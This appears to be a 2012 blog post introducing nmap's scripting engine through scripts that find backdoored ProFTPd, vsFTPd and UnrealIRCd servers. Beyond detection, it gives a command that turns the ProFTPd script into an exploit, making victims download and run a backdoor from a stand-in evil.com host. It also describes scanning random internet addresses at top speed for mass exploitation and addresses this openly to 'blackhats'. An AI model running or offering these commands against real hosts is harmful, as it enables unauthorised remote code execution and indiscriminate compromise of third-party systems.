#nmap scripting

Nmap is not just limited to scanning and host-OS/service version detection and such, it also features an AWESOME scripting engine (the NSE) which uses LUA for its scripts. I hope to cover many "fun" uses of nmap's scripting engine over the next while, though this post is going to be a bit... Edgier and more "evil" in a sense. Also VITALLY useful and important for those of you hunting down backdoored boxes!! Every so often someone pops an open source projects SVN or such, and backdoors the source code. This source code then finds its way onto potentially millions of systems, depending on if/when the breach is detected, or the backdoor is noticed. Sometimes, someone writes an nmap script to scan for such compromised systems, and, god forbid, even exploit them! We will be showing off the following three scripts in this post, and using it as a primer for using nmap's scripts. (I will only be giving demo usage of one, the other two are the same and are left to the reader as an exercise.) ftp-proftpd-backdoor.nse ftp-vsftpd-backdoor.nse irc-unrealircd-backdoor.nse These scripts are intended to locate backdoored installations of ProFTPd, vsFTPd, and UnrealIRCd, respectively. For the example, we will use: "ftp-proftpd-backdoor.nse" This script is intended to locate backdoored installations of ProFTPd - OSVDB-ID 69562 - and tests them using the "id" command. Please note, this is regarded as a "remote root" vulnerability and was (And is) actively exploited in the wild. Basic Usage: root@bha:~# nmap --script ftp-proftpd-backdoor victim.tld This simply tests for the vulnerability, using all defaults. Nothing too special, but VERY useful for quickly testing. Using as an exploit! This script takes an arguement that allows you to specify a custom command to run on the vulnerable system, which is VERY useful during a penetration test! root@bha:~# nmap --script ftp-proftpd-backdoor --script-args ftp-proftpd-backdoor.cmd="wget http://evil.com/backdoor.pl & perl backdoor.pl" victim.tld Please note the --script-args followed by the arguement (arg=var format) showing what command to run. In this example we have it forcing the vulnerable host to download and run a backdoor. (Yes, another one. This time maybe a reverse shell, or a loader for something like Jynx Rootkit...). Mass Haxploitation? Ok. Now for the real blackhats in the audience... Yes, you can scan ranges with this. Just replace target.tld with your standard CIDR range specifier... OR... For those who are less discriminate, the -iR flag and not bothering to specify a target range will simply scan IP's at random. Further optimizations include the -p21 (only port 21) arguement, the -T5 (Insane scan speed) and -P0 (Don't waste my time pinging!) arguements... The other two are similar. To get information on them (an exercise best left to the reader), perhaps the following may be of assistance: root@bha:~# nmap --script-help ftp-proftpd-backdoor Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-16 00:41 IST ftp-proftpd-backdoor Categories: exploit intrusive malware vuln http://nmap.org/nsedoc/scripts/ftp-proftpd-backdoor.html   Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous <code>id</code> command by default, but that can be changed with the <code>ftp-proftpd-backdoor.cmd</code> script argument. See? You can ask for help! Just pass the name of the script to nmap, and it will help you out using the nsedoc engine :) Another challenge that I put out there for any aspiring evil geniuses: How about using all three scripts AT ONCE? Optimized? It CAN be done, and when I get back I will show how. Just for now... See below :P Best regards, and a note: I likely will not be writing too much over the next couple of days, as I just turned 20 and plan on being rather hungover and TOTALLY useless for a day or so... However, my other stuff is at http://insecurety.net/ and http://theinfodox.blogspot.com (migrating that to here...)... Also, checking out http://blackhatacademy.org is an EXCELLENT idea!